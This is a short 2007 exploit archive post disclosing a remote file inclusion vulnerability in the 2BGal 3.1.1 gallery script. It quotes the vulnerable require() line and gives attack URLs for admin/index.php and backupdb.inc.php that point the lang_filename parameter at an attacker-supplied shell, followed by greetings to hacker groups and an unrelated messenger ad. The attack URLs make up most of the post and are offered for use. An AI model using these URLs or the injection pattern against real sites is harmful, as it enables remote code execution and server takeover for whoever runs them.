Home / exploits 2bgal-rfi.txt
Posted on 03 April 2007
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= 2BGal 3.1.1 <= (admin/index.php) Remote File Include Vulnerability Script: 2BGal Version: 3.1.1 Download: http://www.ben3w.com/multimedia/2bgal.zip Discover: BorN To K!LL =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= Bug in: admin/index.php & backupdb.inc.php ...... and so on >> Code: require($lang_filename); =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= ExploiT: ~~~~~ wWw.site.cOm/[path]/admin/index.php?lang_filename=[ BorN-SHell ] wWw.site.cOm/[path]/admin/backupdb.inc.php?lang_filename=[ BorN-SHell ] =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= GreeTz 2: str0ke - Dr.2 - AsbMay .... AsbMay's Group & Kuwait Security =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= _________________________________________________________________ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/